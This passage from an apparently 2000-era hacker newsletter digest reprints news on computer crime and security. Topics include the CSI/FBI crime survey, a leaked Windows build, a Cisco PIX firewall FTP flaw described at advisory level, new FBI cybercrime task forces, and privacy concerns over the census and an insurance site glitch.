FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive.

Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized."

According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html.

@HWA

56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by rootfest

RootFest is back for its second try. RootFest 2000 will be June 14-16, 2000, and will be held at the brand-new St. Paul RiverCentre facility just 15 minutes from the Mall of America.
Three days of speakers, events, contests and more is planned, making this a can't-miss event.

RootFest
http://www.rootfest.org/

@HWA

57.0 HNN:Mar 22nd:Cybercrime On The Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Computer Security Institute and the San Francisco FBI Computer Intrusion Squad jointly released a report today that said that electronic crime cost companies at least $266 million last year. The study found that 70% of the responding companies detected the unauthorized use of their computer systems in the last 12 months up from 62% the year before. Insiders and disgruntled employees topped the lists of worrisome security threats. (One conclusion that can be drawn from this study is that e-crime is on the rise, another is that people are more willing to admit intrusions or that detection of criminal activity has gotten better. The numbers are interesting but really don't say anything.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop

Late Update 0943EST

An anonymous person was kind enough to send us a link directly to the summary results of the above mentioned survey.

Computer Security Institute
http://www.gocsi.com/prelea_000321.htm

ZDNet; Report: 'E-crime is booming'

Some 70 percent of companies queried in a new study have detected attacks on their networks, the FBI/CSI reports.

By Robert Lemos, ZDNet News
UPDATED March 22, 2000 10:00 AM PT

SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming business, according to a survey released by the Computer Security Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday.

The study found that 70 percent of CSI's 585 member companies that responded to its survey detected the unauthorized use of their computer systems in the last 12 months -- up from 62 percent the year before.

"Isn't e-commerce booming?
Then e-crime is booming," said Richard Power, editorial director and analyst for the Computer Security Institute. "The Internet revolution is going on regardless, but the more commerce that goes online, the more crime that goes online as well."

While not a scientific estimate of computer crime, the report does measure the anonymous admissions of more than 640 security professionals who are part of CSI.

Insiders the biggest fear

More than three-quarters of those professionals identified hackers as a security threat, but insiders concerned the respondents more, with 81 percent worried about disgruntled employees.

CSI's Power explained that professional hackers are more of a threat, however. "That's the real problem, not a juvenile hacker," he said. "The point is, if a 16-year-old kid can do (what we have seen), then what are the professionals doing?"

The report also indicates that corporate computer systems are far from secure. Almost 90 percent of the security professionals who answered the survey detected a security threat, which includes unauthorized access as well as improper use of a corporate computer or e-mail and computer viruses.

Of those intrusions, only 42 percent of the companies affected put a dollar sign on the amount of damage done. The total: $266 million.

With only one computer security administrator per 1,000 computers, the situation may not get any better soon.

-=-

CSI; Mar 22, 2000

FOR IMMEDIATE RELEASE

Contact: Patrice Rapalus, Director
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
415/905-2310
Internet: prapalus@cmp.com

Ninety percent of survey respondents detect cyber attacks, 273 organizations report $265,589,940 in financial losses

SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the results of its fifth annual "Computer Crime and Security Survey."
The "Computer Crime and Security Survey" is conducted by CSI with the participation of the San Francisco Federal Bureau of Investigation's (FBI) Computer Intrusion Squad. The aim of this effort is to raise the level of security awareness, as well as help determine the scope of computer crime in the United States.

Highlights of the "2000 Computer Crime and Security Survey" include the following:

  - Ninety percent of respondents (primarily large corporations and government agencies) detected computer security breaches within the last twelve months.

  - Seventy percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse"--for example, theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks.

  - Seventy-four percent acknowledged financial losses due to computer breaches.

  - Forty-two percent were willing and/or able to quantify their financial losses. The losses from these 273 respondents totaled $265,589,940 (the average annual total over the last three years was $120,240,180).

Financial losses in eight of twelve categories were larger than in any previous year. Furthermore, financial losses in four categories were higher than the combined total of the three previous years. For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27,148,000. The total financial losses due to sabotage for the previous years combined totaled only $10,848,850.

As in previous years, the most serious financial losses occurred through theft of proprietary information (66 respondents reported $66,708,000) and financial fraud (53 respondents reported $55,996,000).

Survey results illustrate that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming the trend in previous years.
Seventy-one percent of respondents detected unauthorized access by insiders. But for the third year in a row, more respondents (59%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (38%).

Based on responses from 643 computer security practitioners in U.S. corporations, government agencies, financial institutions, medical institutions and universities, the findings of the "2000 Computer Crime and Security Survey" confirm that the threat from computer crime and other information security breaches continues unabated and that the financial toll is mounting.

Respondents detected a wide range of attacks and abuses. Here are some other examples:

  - 25% of respondents detected system penetration from the outside.
  - 27% of respondents detected denial of service attacks.
  - 79% detected employee abuse of Internet access privileges (for example, downloading pornography or pirated software, or inappropriate use of e-mail systems).
  - 85% detected computer viruses.

For the second year, we asked some questions about electronic commerce over the Internet. Here are some of the results:

  - 93% of respondents have WWW sites.
  - 43% conduct electronic commerce on their sites (in 1999, it was only 30%).
  - 19% suffered unauthorized access or misuse within the last twelve months.
  - 32% said that they didn't know if there had been unauthorized access or misuse.
  - 35% of those acknowledging attack reported from two to five incidents. 19% reported ten or more incidents.
  - 64% of those acknowledging an attack reported Web-site vandalism.
  - 60% reported denial of service.
  - 8% reported theft of transaction information.
  - 3% reported financial fraud.

Patrice Rapalus, CSI Director, suggests that the "Computer Crime and Security Survey," now in its fifth year, has delivered on its promise to raise the level of security awareness and help determine the scope of crime in the United States.
"The trends the CSI/FBI survey has highlighted over the years are disturbing. Cyber crimes and other information security breaches are widespread and diverse. Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. The 273 organizations that were able to quantify their losses reported a total of $265,589,940. Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly adequate staffing and training of information security practitioners in both the private sector and government."

Bruce J. Gebhardt is in charge of the FBI's Northern California office. Based in San Francisco, his division covers fifteen counties, including the continually expanding "Silicon Valley" area. Computer crime is one of his biggest challenges.

"If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen. The results of the CSI/FBI survey provide us with valuable data. This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level but identifies emerging crime trends and helps me decide how best to proactively, and aggressively assign resources, before those 'trends' become 'crises.'"

###

CSI, established in 1974, is a San Francisco-based association of information security professionals. It has thousands of members worldwide and provides a wide variety of information and education programs to assist practitioners in protecting the information assets of corporations and governmental organizations.
The FBI, in response to an expanding number of instances in which criminals have targeted major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC) located at FBI headquarters and the Regional Computer Intrusion Squads located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyber attacks on the nation's infrastructures. (These infrastructures include telecommunications, energy, transportation, banking and finance, emergency services and government operations). The mission of Regional Computer Intrusion Squads is to investigate violations of Computer Fraud and Abuse Act (Title 8, Section 1030), including intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes.

Copyright 2000 Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
Telephone: (415) 905-2626
Fax: (415) 905-2218.

@HWA

58.0 HNN:Mar 22nd:The Next Version of Windows Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

While Windows 2000 only just recently shipped Microsoft is already working on the next generation of the operating system. Code named Whistler, build 2211.1 has been liberally spread around pirate sites across the net.

Beta News
http://betanews.efront.com/article.php3?sid=953595359

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop

Beta; Whistler Hits the Web

By Nate Mook, eFront
March 20th, 2000, 6:35 PM

An internal build of Microsoft's future operating system, set to combine consumer and business versions into a product currently codenamed Whistler Windows 2001, has leaked out onto the Internet.
Build number 2211.1 was posted onto various college and Internet sites early this morning and spread as per usual, like wildfire.

While the new operating system currently looks almost identical to Windows 2000, a number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users. For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options.

Whistler does contain the infamous MarsCore.DLL file which started rumors last month regarding the purpose of Mars, now known to be part of the future version of Microsoft's MSN client. However, it is unknown whether or not the new HTML folders are part of the Mars core or if users will be given the opportunity to switch off more user friendly parts of the operating system.

As usual with an early Alpha release, most new features and enhancements will not be added until Beta 1. Keep checking back for continued coverage regarding Microsoft Whistler.

ActiveWin contributed to this report.

-=-

ZDNet; Windows 2001 leaked on the Web

A pirated version of Windows 2001 is winding its way across the Net. And it looks a lot like today's Windows.

By Mary Jo Foley, ZDNet News
UPDATED March 21, 2000 2:03 PM PT

Microsoft Corp.'s next full-fledged version of Windows, code-named Whistler, is at least a year away from release -- but already a pirated version of one of the latest builds has found its way onto the Net.

As reported by the Windows enthusiast sites ActiveWin and BetaNews, a recent internal build of Whistler has been posted illegally to a number of college and Internet sites. ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday morning and "spread as per usual, like wildfire."

Whistler is the code name for the first full-fledged upgrade to Windows 2000 that will be based on the Windows NT kernel, rather than the Windows 9X kernel.
(The Windows 9X update is code-named Millennium and expected to ship in the third or fourth quarter of this year.) Whistler is tentatively slated to ship in March 2001, according to internal Microsoft documents.

Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the development process. But sources close to the company say the latest "stable" internal developers build is numbered 2207. The most recent internal test build is 2214, sources add.

A Microsoft spokesman said the company was investigating reports of pirated Whistler builds but would make no further comment.

Looks like Win2000 -- so far

As noted by ActiveWin, the pirated Whistler build looks almost identical to Windows 2000 Professional. "A number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users," ActiveWin reported. "For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options."

One change under the hood, according to ActiveWin, is the inclusion of the MarsCore.DLL file. "Mars" is the code name for user interface technology slated to be included in a future version of Microsoft's MSN client. At one point, Mars was used as the code name for the next version of a consumer-oriented version of Internet Explorer.

After signing up Mars beta testers last fall, Microsoft sent out a note telling testers it had delayed the start of the beta because the company was "rethinking some of our most basic assumptions" regarding the future user interfaces.

It isn't just in the user interface that Microsoft has been redrawing its Windows road map. In January, Microsoft acknowledged that it had tabled work on "Neptune," a consumer version of Windows slated to follow Millennium, and on "Odyssey," an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it planned to merge the Neptune and Odyssey code bases in the form of Whistler.
The follow-on to Whistler, code-named Blackcomb, is expected to ship in 2002 or later.

@HWA

59.0 HNN:Mar 22nd:Toronto Business Held For Extortion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

An unnamed business in the Toronto area was held for ransom of less than $5,000 after a 14-year-old youth took control of the company's chat-room and email servers. Police arrested the individual after arranging a meeting to deliver the money. The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production and possession of counterfeit money, and two counts of unauthorized use of a computer. (And they say there are not enough computer crime laws.)

National Post
http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news

Wednesday, December 22, 1999

14-year-old computer whiz charged after company given extortion demand

Arrested in Keswick

Chris Eby
National Post

A 14-year-old computer whiz, who allegedly hacked into the accounts of a downtown Toronto business and tried to extort the owners, was charged yesterday with a raft of extortion and counterfeiting-related offences after a police sting operation.

The boy, who cannot be named under the Young Offenders Act, took control of the business's e-mail and chat rooms -- two operations vital to the business' survival -- for two weeks. He contacted the owner of the business through the Internet, demanding cash before he returned control of the accounts.

"He obviously displays a capability in computers that appears to be above average," said Detective Myron Demkiw. "They're pretty serious offences ... this is all relatively new ground for everybody."

The owner of the business contacted police, who traced the suspect to Keswick, a town 60 kilometres north of Toronto.
Investigators arranged a meeting on Monday where the suspect was supposed to receive the money he was demanding (a sum less than $5,000 was all police would say), and was arrested. "He was calm throughout," Det. Demkiw said of the youth.

As a result of the investigation, detectives executed a search warrant on the boy's home and seized his computer, related documents, and some counterfeit money.

When asked if he had ever come across anything like this, Det. Demkiw replied: "No, never, and this will be something new to the courts as well."

The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production of counterfeit money, and two counts each of unauthorized use of a computer, and possession of counterfeit money.

@HWA

60.0 HNN:Mar 22nd:Is the Census Secure?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The long form of the US Census has sparked privacy concerns ever since it was introduced in 1960. With the increased awareness of computer security and identity theft those fears are even greater. Some residents fear giving out their personal information on the off chance that it may be stolen or otherwise fall into the wrong hands. The Census Bureau has taken some solace in the fact that it has never suffered a computer related break-in.

Philadelphia Inquirer
http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm

Census queries raising computer-security questions

New inquiries strike some as an opening to hackers or invasions of privacy. Bureau officials say fears could reduce responses.

By Thomas Ginsberg
INQUIRER STAFF WRITER

Betty McAdams is afraid computer hackers could steal her personal information. Joe Alessandroni figures marketers somehow will buy his. Entire Web sites question the government's right to the data at all.
In the last two weeks, about 15 million Americans began receiving the most intrusive government questionnaire most will ever fill out. The "Long Form" from the U.S. Census Bureau - 37 pages filled with 53 questions about everything from language skills to toilets - is prompting some recipients to squeal about invasion of privacy, a complaint that has arisen every decade since the long form was launched in 1960.

This year, however, Census officials and privacy experts said they detect a more pointed fear: concern about computer security. The growth of the Internet since the 1990 Census along with high-profile attacks on Web sites such as Yahoo have exacerbated already-rising concerns about the safety of any information on any computer anywhere.

"Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant director of Greater Philadelphia First, an alliance of business executives in the region. "I assume they're going to compile all this information on a computer somewhere. . . . Probably if [computer hacking] had not happened so recently, I might not be as alarmed."

To increasing numbers of people, the country is facing a "privacy Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and editor of a national newsletter on business privacy. "It doesn't surprise me that the Census Bureau is going to have more trouble this year than before."

Unfortunately, some salient facts get lost in the din: The Census Bureau has never suffered a computer-related security breach, experts agree. Its computers are kept separate from other government systems, and respondents' names are separated from personal data when the results are eventually compiled into databases, Census officials say.

Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme Court, has jealously guarded its records; in 1942, it even rebuffed a demand from the U.S. War Department for information on potential draftees.
Census officials, for their part, take the once-a-decade privacy complaints in stride as they collect the statistics for use in redrawing congressional districts and determining federal funding formulas. Questions about household income, for example, are used to estimate the number of subsidized lunches the neighborhood school might have to provide. This year's new question about whether a resident provides primary care for a grandchild is linked to welfare allocations.

Maury Cagle, a bureau spokesman, said that even though the agency's confidentiality record is clean, "people have an ingrained suspicion about computers and private information. All of those things add to the falling response rate."

The Census Bureau projects its response rate for the 2000 Census will hit its lowest level ever: 61 percent, down from 75 percent in 1980. As the response rate drops, the government has to hire ever more head-counters - "enumerators," in bureau jargon - to brave back streets and barking dogs to get the information personally. This year, the Census Bureau is mounting a $230 million outreach campaign designed to raise the response rate and keep down the expense of enumerators.

Still, "people are a little more testy" about giving out personal information than in years past, said Gorden DeJong, director of Pennsylvania State University's Population Research Institute. DeJong and others blame everything: a spate of high-profile computer attacks; rising concerns about confidentiality; a constant if sometimes fluctuating distrust of government; and an ever-widening flood of private surveys and junk mail with which Americans already contend.

"For the number of things I get in the mail, I already must be on 50 lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's pretty obvious to me that there's no such thing as secrecy. . . . The information is bound to get around."
In the last two weeks, either the long form or a separate three-page short form was mailed to 113 million households. An additional 22 million households with incomplete addresses or post office boxes were having their forms hand-delivered. Households that don't return the form by April 1 may get a visit from an enumerator.

Every sixth household got a long form. The ratio was set by a scientific sampling formula, and people may not fill out a long form unless they were selected, said Phillip Lutz, assistant regional manager for the Census region comprising Pennsylvania, New Jersey, Maryland, Delaware, and Washington.

Each form arrives bearing the bold-faced words: "Your Response is Required by Law." What is not written is the fact that the $100 fine for failing to respond - a fine dating to at least 1954 - apparently has not been imposed in decades, even though federal courts have upheld the constitutionality of the participation law.

"We're not interested in fining people. We're interested in collecting information," Lutz said.

Still, some people are willing, even eager, to pay the fine rather than give up personal information.

"I wrote the number of people living in my house and enclosed a $100 check," said a 41-year-old participant in an Internet chat room about the Census, who spoke on condition that only his first name, Greg, be printed. "Why is it any of their business how I am paying or have paid for my home?"

So far, the refusers appear to be in the minority. State and local officials across the country have joined with community and immigrant groups to push for full participation, arguing that the sacrifice pays off in federal funding. Pennsylvania officials have estimated that each person counted in Philadelphia is worth an average of $2,200 in federal funds.

"The very people who are not participating need to be counted so they can have government services in their neighborhood," said Kate Kunda, 45, a Spanish teacher from Wayne, Delaware County.
As for herself, Kunda added: "I was annoyed that they wanted to know about my electricity bill and mortgage, but we did make an effort to fill it out."

@HWA

61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

A software glitch allowed visitors to Selectquote.com to view the personal information of the previous visitor. At least 20 users had everything from name and address to current insurance coverage and parents' health histories revealed.

MSNBC
http://www.msnbc.com/news/385464.asp?0m=T12R

Insurance site exposes personal data

Glitch on Selectquote site reveals information to next user

By Mike Brunker
MSNBC

March 22 — Consumers who requested online life insurance quotes from Selectquote.com on Tuesday and Wednesday got more than they bargained for: Thanks to a software glitch, their personal information was left on the company's Web site for the next user to see.

THE PROBLEM occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This left everything from the previous user's name and address to information on current coverage and parents' health histories plainly visible to the next person to request a quote.

Lyle Griffin, a spokesman for Selectquote, said the problem occurred when programmers fixed a piece of code on the site that was causing a problem for users with an older version of Internet Explorer. Unfortunately, the fix created a problem in the quote request form, he said.

The problem lasted from 4 p.m. PT on Tuesday until about 10 a.m. PT Wednesday, but it affected only about 20 users who were directed to a newly designed Selectquote site that is still being tested, Griffin said.

"Not to minimize it," he said of the problem. "Obviously this is extremely embarrassing."
MSNBC.com was alerted to the problem late Tuesday by a prospective Selectquote customer, who was outraged that other visitors to the site were able to view her personal information.

"About 10 minutes (after filling out the form) I got a call from a woman in Ohio who said, 'I'm just someone who's on Selectquote and all your information is prepopulated in the questionnaire,'" said Ona Karasa of Bellevue, Wash.

She said she went back on the site Wednesday morning and saw the information of two other people who apparently had just requested life-insurance quotes using the online service. MSNBC editors also were able to access personal information entered by other users until midmorning Wednesday.

Another user, Richard Underwood of Rockville, Md., said he was alerted to the problem early Wednesday by e-mail from another Selectquote surfer. He said a company representative had called and left a message concerning his request for a quote, but did not mention the Web site problem.

"Truthfully, I don't know if I want to talk to anyone at Selectquote about life insurance at this point," he said.

Underwood said the experience would likely make him pause the next time he is prompted to enter personal information on a Web site.

"I was just getting to the point where I was reasonably comfortable doing that, but I may have to think twice if this is how it works," he said.

@HWA

62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

Last week Cisco admitted that it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies. The vulnerabilities affect any PIX firewall that has enabled FTP, which is turned on by default.
Vnunet
http://www.vnunet.com/News/601083

John Leyden, Network News [22 Mar 2000]

Cisco admits to serious PIX firewall flaw

Cisco last week admitted that two security vulnerabilities affecting its PIX firewalls could leave corporate networks open to attack.

In an interim security notice, the vendor acknowledged the existence of two related vulnerabilities that both cause its Secure PIX Firewalls to interpret FTP (File Transfer Protocol) commands out of context, leaving the networks behind the firewalls open to penetration.

Cisco said that in certain configurations "it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies".

All Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3), that are configured to provide access to FTP services, are at risk from both vulnerabilities.

Cisco admitted that the problem means any Cisco Secure PIX Firewall that has enabled the fix-up protocol FTP command could allow unauthorised data to reach the network it is designed to protect.

Deri Jones, managing director of security tester NTA Monitor, described the issue as "serious", particularly because Cisco's offering is currently the third most popular firewall in the market.

"To Cisco's credit it has issued a bulletin, but has not yet found any solutions. This will not be trivial to address and may take it some time," warned Jones.

Clive McCafferty, managing director of security consultant CenturyCom, said that many users, which include BT, use Cisco's PIX firewalls for managed services. "This could allow an attacker to send spurious stuff and then launch an attack when a port is open," said McCafferty.

The first vulnerability, which remains unfixed, is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands.
The client begins an FTP connection as expected, and at the same time unexpectedly executes another command opening a separate connection through the firewall. The only solution Cisco currently suggests for this problem is disabling incoming FTP services.

Any server that permits internal clients to make arbitrary outbound FTP connections may be vulnerable to this issue.

The second, related problem is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command that the firewall interprets as a distinct command. This can be exploited to open a separate connection through the firewall.

Both vulnerabilities are due to the command fix-up protocol FTP (portnum), which is enabled by default on the Cisco Secure PIX Firewall. To exploit the security flaws, attackers must be able to make connections to an FTP server protected by the PIX Firewall.

@HWA

63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lew

A new state-of-the-art computer lab was unveiled by officials at the College of DuPage in Illinois on Monday at the college's Suburban Law Enforcement Academy. The lab will offer police officers (no civilians allowed) courses in reconstructing an electronic crime scene, as well as how to present such evidence in court. The lab, valued at $250,000, was donated by Microsoft Corp. and Omni Tech Corp.
Chicago Tribune - Registration Required
http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html

@HWA

64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse and Evil Wench

A joint operation of federal and local authorities named the Pittsburgh High Tech Computer Crimes Task Force will try to help in the fight against cyber crime. The Task Force was announced on Tuesday at the Pittsburgh FBI offices.

Pittsburgh Tribune
http://www.triblive.com/digage/dfbi0323.html

Pittsburgh Post Gazette
http://www.post-gazette.com/regionstate/20000322cybercrime1.asp

Tribune;

FBI installs new task force aimed at fighting cybercrimes

By Erik Siemers
TRIBUNE-REVIEW

The aqua Macintosh G3 computer, its electronic guts exposed, appeared harmless as it sat on a table in the Pittsburgh FBI offices Tuesday.

But its hard drive tells investigators a different story - it was used to print counterfeit corporate checks.

That Macintosh is one of the computers under examination by the Pittsburgh High Tech Computer Crimes Task Force. The medley of federal and local authorities trained to investigate computer-related crimes was unveiled yesterday.

The task force, one of the first in the nation, pools experts from local agencies such as Pittsburgh police with federal agencies such as the Secret Service and the Internal Revenue Service into one room to combat the rapid growth of cybercrimes.

"Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S. Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by marshaling our resources."

Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet fraud," partly because it has more software development firms than Silicon Valley, Litman said.
"Our position poses significant vulnerability to cybercrimes," Litman said.

The task force will be free to use each agency's resources along with those at Carnegie Mellon's Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked systems survivability program. CERT will provide technical assistance to the task force, Pethia said.

Each agency offers one representative to the task force who has been trained in forensic examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and Computer Crimes Division.

Aside from providing intelligence and technical assistance to computer investigations, the task force will focus on investigations where the Internet was used as the main tool in committing the crime.

Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C., said all FBI field offices will eventually house task forces similar to Pittsburgh's.

Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office.

The city also has a good track record for law enforcement agencies working with each other and with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley.

Task force members will use traditional investigation skills along with advanced knowledge of technology to crack computer cases, said Vatis.

"We need to have the technology to get the digital evidence," Vatis said.

Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the task force.

"When we go to court we can say we never touched (the evidence)," Hyslip said.
-=-

Gazette;

City at forefront of war on cybercrime

FBI forming task forces to fight crimes of Internet age

Wednesday, March 22, 2000

By Torsten Ove, Post-Gazette Staff Writer

With its aging population and Rust Belt image, Pittsburgh may hardly seem like the kind of town the federal government would choose as a base for its war on sophisticated cybercrime.

But yesterday, as local law enforcement officers stood stiffly for the cameras at FBI headquarters Downtown, authorities announced the creation of the nation's first task force specifically designed to combat computer intrusion, Web site vandalism, on-line espionage and other crimes of the rapidly evolving Internet age.

"This is the future, but it is also very much the present," said Michael Vatis, the FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of cybercrime prevention."

The task force, comprised of federal, state and local agencies, is one of 16 planned nationwide in major cities. Pittsburgh was chosen because of the prevalence of software development companies here and the presence of Carnegie Mellon University's Computer Emergency Response Team, the nation's leading cybercrime research facility.

In addition to focusing on complex computer and Internet crimes, FBI officials said the local task force will provide technical assistance to police departments in investigations of fraud, child pornography and identity theft that involve computers.

Vatis, director of the National Infrastructure Protection Center in Washington, D.C., said computers are changing the face of crime so quickly that law enforcement agencies have to work together to keep up.
In addition to working to combat large-scale attacks such as the one that disabled Yahoo!, eBay and other e-commerce Web sites last month, federal authorities have been scrambling to head off all manner of computer crimes, from organized hacking of government computers by suspected foreign agents to amateur vandalism such as that committed by the teen-ager who vandalized an anti-drug Web site with pictures of Beavis and Butthead.

Locally, FBI Special Agent John P. Joyce said his agency is investigating 30 to 40 cases of computer intrusion and similar crimes, although he wouldn't reveal details of any of them.

Because of their technical nature, each investigation requires much more expertise than the traditional capers tackled by FBI agents of old. The new breed of federal crime fighter is more likely to be an agent sitting at a computer all day than a suit-and-tie swashbuckler with a gun kicking down doors.

"These cases are a lot more complicated than physical crime," said Vatis, "and they take a longer time to solve."

Richard D. Pethia of CMU's CERT warned that the "denial of service" attacks that knocked the Internet companies off-line in February are only the beginning of new waves of cyberspace assaults.

In 1998, he said, his center examined 4,000 incidents. Last year, the number reached 8,000. This year, it could double again.

"This problem is real and it's here," he said. "The nasty thing about computer attacks is that they can be launched from anywhere on the planet."

And it can be nearly impossible to track down the culprits and then prove they are responsible for specific on-line exploits. The attacks on the e-commerce companies, for example, remain unsolved, although Vatis said the FBI is making progress in the case.

Not everyone is convinced the federal government, working with experts in the private sector, has what it takes to match wits with serious hackers bent on mayhem.
"If I were a cyber criminal with the FBI after me, I would sleep like a baby," said Jay Valentine, president of InfoGlide Corp., an Internet security company, in a recent Scripps Howard report about Internet security. "Even a blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The best ones are a generation ahead of the FBI."

Other critics have blasted the FBI and the National Infrastructure Protection Center for reacting too slowly to the attacks on 30 university systems last year that laid the groundwork for the e-commerce shutdown last month.

In a USA Today report, experts -- many of them cybersleuths selling their services -- also said the government's efforts were hindered by inter-agency squabbling and the fact that some companies don't trust the FBI enough to share information with agents.

Vatis wouldn't address the USA Today report except to say that it was inaccurate. Regarding the charge of slow government reaction, he said the protection center issued a warning about the denial-of-service threat in plenty of time.

The National Infrastructure Protection Center's Web site shows the warning went out on Dec. 30 and included detailed information about what defensive steps to take.

Still, Vatis acknowledged that government agencies are "still in the process of getting up to speed."

@HWA

65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

To encourage companies to release information about online attacks a new bill would provide firms with an exemption to the Freedom of Information Act. Representatives Tom Davis, R-Va. and Jim Moran, D-Va. plan to introduce the bill later this week. It is hoped that this exemption will promote the reporting of cyber attacks by industry. (And at the same time erode citizens' rights.)
Newsbytes
http://www.newsbytes.com/pubNews/00/146086.html

Bill Would Protect Firms That Share Hacking Info

By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST

A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA).

Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today.

"The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said.

While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said.

When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said.

